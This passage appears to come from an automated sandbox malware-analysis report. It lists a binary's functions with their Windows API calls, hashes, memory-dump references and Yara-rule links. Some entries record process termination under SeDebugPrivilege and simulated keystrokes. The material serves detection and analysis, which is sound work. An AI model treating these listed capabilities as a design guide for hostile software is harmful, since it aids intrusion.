                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConnectConnection2FromQueryRegistryStringValue_memmove_memset
                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                          • API String ID: 1159971868-22481851
                                                                                                                                                          • Opcode ID: 84086df0d60527a53b907603c850086502cd69453be99f37242d2e4a2edca353
                                                                                                                                                          • Instruction ID: 709d6f20dd99b9454e27b79c597b1f7d3ef1fa36fee682134d496b02bf1afd43
                                                                                                                                                          • Opcode Fuzzy Hash: 84086df0d60527a53b907603c850086502cd69453be99f37242d2e4a2edca353
                                                                                                                                                          • Instruction Fuzzy Hash: 45414D76C1022CABCF11EBA4EC85DEEB778BF14704F40412AF911A71A0EB749E54CB50
                                                                                                                                                          Function 0017BAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001BDBF0), ref: 0017BBA1
                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001BDBF0), ref: 0017BBD5
                                                                                                                                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0017BD33
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0017BD5D
                                                                                                                                                          • StringFromGUID2.COMBASE(?,?,00000028), ref: 0017BEAD
                                                                                                                                                          • ProgIDFromCLSID.COMBASE(?,?), ref: 0017BEF7
                                                                                                                                                          • CoTaskMemFree.COMBASE(?), ref: 0017BF14
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 793797124-0
                                                                                                                                                          • Opcode ID: cd2eb9d8ac6d4c47f5de9d8989de82b2ba2ae9b966293ce57ee31448532ba878
                                                                                                                                                          • Instruction ID: 6af6868b5b3b8b79d72404414a1cff874c28f71dfe6cd80c19181ab868e4c957
                                                                                                                                                          • Opcode Fuzzy Hash: cd2eb9d8ac6d4c47f5de9d8989de82b2ba2ae9b966293ce57ee31448532ba878
                                                                                                                                                          • Instruction Fuzzy Hash: 93F11A75A04109EFCF14DFA4C884EAEB7B9FF89714F108599F909AB250DB31AE41CB90
                                                                                                                                                          Function 0013B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 001249CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00124954,00000000), ref: 00124A23
                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0013B85B), ref: 0013B926
                                                                                                                                                          • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0013B85B,00000000,?,?,0013AF1E,?,?), ref: 0013B9BD
                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0019E775
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0019E7EB
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2402799130-0
                                                                                                                                                          • Opcode ID: e2d95d74e0b92b594e1c1bde7b985f20d29891beb1d303394943c9ed39bb4b7b
                                                                                                                                                          • Instruction ID: cb0a115c988bbe83b3de8d29d666b36b98a96a143b66fd355287fe0775a1644f
                                                                                                                                                          • Opcode Fuzzy Hash: e2d95d74e0b92b594e1c1bde7b985f20d29891beb1d303394943c9ed39bb4b7b
                                                                                                                                                          • Instruction Fuzzy Hash: EE617A30504B41EFDB2ADFA5E9C8B29B7F5FF55315F140519E2868AA70D770A8E0CB81
                                                                                                                                                          Function 0018B14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0018B204
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InvalidateRect
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 634782764-0
                                                                                                                                                          • Opcode ID: ec00484dfa92d5de2a24783ec0cef41422e64a49b88a07f6a7fc31f4c57884e0
                                                                                                                                                          • Instruction ID: 505117f7292533d465544694acffd072d318238822c22b49fe491f1fe8c0ff92
                                                                                                                                                          • Opcode Fuzzy Hash: ec00484dfa92d5de2a24783ec0cef41422e64a49b88a07f6a7fc31f4c57884e0
                                                                                                                                                          • Instruction Fuzzy Hash: F3518E70608604BEEF24BF28ACD9B9E7B65BB16310F204112FA15DA5A1C771EB948F50
                                                                                                                                                          Function 0013A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0019E9EA
                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0019EA0B
                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0019EA20
                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0019EA3D
                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0019EA64
                                                                                                                                                          • DestroyCursor.USER32(00000000), ref: 0019EA6F
                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0019EA8C
                                                                                                                                                          • DestroyCursor.USER32(00000000), ref: 0019EA97
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3992029641-0
                                                                                                                                                          • Opcode ID: 5fc42a03faecfc1f702c37d35e90f3a329c27f336d74d3ebbd735de526c0a10f
                                                                                                                                                          • Instruction ID: 6476d21eeb5e7d6203fc7bfc7aea9dd3eb3518ff7bdbc501a95c50d854669ab6
                                                                                                                                                          • Opcode Fuzzy Hash: 5fc42a03faecfc1f702c37d35e90f3a329c27f336d74d3ebbd735de526c0a10f
                                                                                                                                                          • Instruction Fuzzy Hash: A9515670600605AFDB24DF68CC82FAA7BF5BF18754F104619F9869B6A0D7B0ED909B50
                                                                                                                                                          Function 0013F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0013F737
                                                                                                                                                          • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0013F77E
                                                                                                                                                          • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0019EB55
                                                                                                                                                          • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0019E9A0,00000004,00000000,00000000), ref: 0019EBC1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                          • Opcode ID: bc2eab767d83d1b982eb4f4fa601401804a3e9c0e412356c1556b420e7fd3088
                                                                                                                                                          • Instruction ID: ff999399fbf36ad2420c164fa16b2959ccb6e43f4797d79b2bcaa80cab1d61ac
                                                                                                                                                          • Opcode Fuzzy Hash: bc2eab767d83d1b982eb4f4fa601401804a3e9c0e412356c1556b420e7fd3088
                                                                                                                                                          • Instruction Fuzzy Hash: 19411830E04AC0EADF398B38DCCDB7A7AD56B56305F69082DE08F82961C770E882D711
                                                                                                                                                          Function 0015CDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015E138: GetWindowThreadProcessId.USER32(?,00000000), ref: 0015E158
                                                                                                                                                            • Part of subcall function 0015E138: GetCurrentThreadId.KERNEL32 ref: 0015E15F
                                                                                                                                                            • Part of subcall function 0015E138: AttachThreadInput.USER32(00000000,?,0015CD34,?,00000001), ref: 0015E166
                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0015CE06
                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0015CE23
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0015CE26
                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0015CE2F
                                                                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0015CE4D
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0015CE50
                                                                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0015CE59
                                                                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0015CE70
                                                                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0015CE73
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2014098862-0
                                                                                                                                                          • Opcode ID: 9db58159dea37c3fc3443f23bf614b36dbbf9d605a36fcb795d522c02817bfdf
                                                                                                                                                          • Instruction ID: b765fa14b3f3e520b6ef8fc9ca88ad03ee96d239c58ec73244247414b412f0d7
                                                                                                                                                          • Opcode Fuzzy Hash: 9db58159dea37c3fc3443f23bf614b36dbbf9d605a36fcb795d522c02817bfdf
                                                                                                                                                          • Instruction Fuzzy Hash: 691104B1A10A18BEF7102F60AC8EF6A3E2DDB1D755F120415F3456B4E0CAF26C809AA4
                                                                                                                                                          Function 0017C604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015A857: CLSIDFromProgID.COMBASE ref: 0015A874
                                                                                                                                                            • Part of subcall function 0015A857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 0015A88F
                                                                                                                                                            • Part of subcall function 0015A857: lstrcmpiW.KERNEL32(?,00000000), ref: 0015A89D
                                                                                                                                                            • Part of subcall function 0015A857: CoTaskMemFree.COMBASE(00000000), ref: 0015A8AD
                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0017C6AD
                                                                                                                                                          • _memset.LIBCMT ref: 0017C6BA
                                                                                                                                                          • _memset.LIBCMT ref: 0017C7D8
                                                                                                                                                          • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 0017C804
                                                                                                                                                          • CoTaskMemFree.COMBASE(?), ref: 0017C80F
                                                                                                                                                          Strings
                                                                                                                                                          • NULL Pointer assignment, xrefs: 0017C85D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                                          • String ID: NULL Pointer assignment
                                                                                                                                                          • API String ID: 1300414916-2785691316
                                                                                                                                                          • Opcode ID: 3dc48327fb5a9c8c2b397b055afdc5aaaaeaff4ecd830e4f15d22728e54b0947
                                                                                                                                                          • Instruction ID: 32d74a48c31a1b8ba9b58c132506d93b55e339adf751eb1faa52ef82221b41fa
                                                                                                                                                          • Opcode Fuzzy Hash: 3dc48327fb5a9c8c2b397b055afdc5aaaaeaff4ecd830e4f15d22728e54b0947
                                                                                                                                                          • Instruction Fuzzy Hash: E5913D71D00228ABDB14DFA4EC81EDEBBB9EF19710F10811AF519A7291EB705A45CFA1
                                                                                                                                                          Function 00189882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00189926
                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 0018993A
                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00189954
                                                                                                                                                          • _wcscat.LIBCMT ref: 001899AF
                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 001899C6
                                                                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001899F4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Window_wcscat
                                                                                                                                                          • String ID: SysListView32
                                                                                                                                                          • API String ID: 307300125-78025650
                                                                                                                                                          • Opcode ID: 595fd3b16277d2d8d08c5fbb9a29f719fcf005a5ae6f4a991c7c9de6278e3313
                                                                                                                                                          • Instruction ID: f0202af43bb9528e29799da1a3570e4cd3d5f639596ae4a222267d8e09352e35
                                                                                                                                                          • Opcode Fuzzy Hash: 595fd3b16277d2d8d08c5fbb9a29f719fcf005a5ae6f4a991c7c9de6278e3313
                                                                                                                                                          • Instruction Fuzzy Hash: 4C41A171A00309ABEF21AF64CC85FEE77A8EF09354F14442AF589A7291D7719A848B60
                                                                                                                                                          Function 00181620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00166F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00166F7D
                                                                                                                                                            • Part of subcall function 00166F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00166F8D
                                                                                                                                                            • Part of subcall function 00166F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00167022
                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0018168B
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0018169E
                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001816CA
                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00181746
                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00181751
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00181786
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                          • String ID: SeDebugPrivilege
                                                                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                                                                          • Opcode ID: fa991f60e4970365ce2e728ea68231bf892a512e50605463ad35c3e9f9d6f930
                                                                                                                                                          • Instruction ID: a7642cc69f2b94876064bb60d6ebb52b0aa64566e03325d2394891c2d15b8122
                                                                                                                                                          • Opcode Fuzzy Hash: fa991f60e4970365ce2e728ea68231bf892a512e50605463ad35c3e9f9d6f930
                                                                                                                                                          • Instruction Fuzzy Hash: FB41AB72600201AFDB04FF54DCA2FADB7A5AF68315F098049F9069F292EBB4DA45CF51
                                                                                                                                                          Function 00166237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 001662D6
                                                                                                                                                          Strings
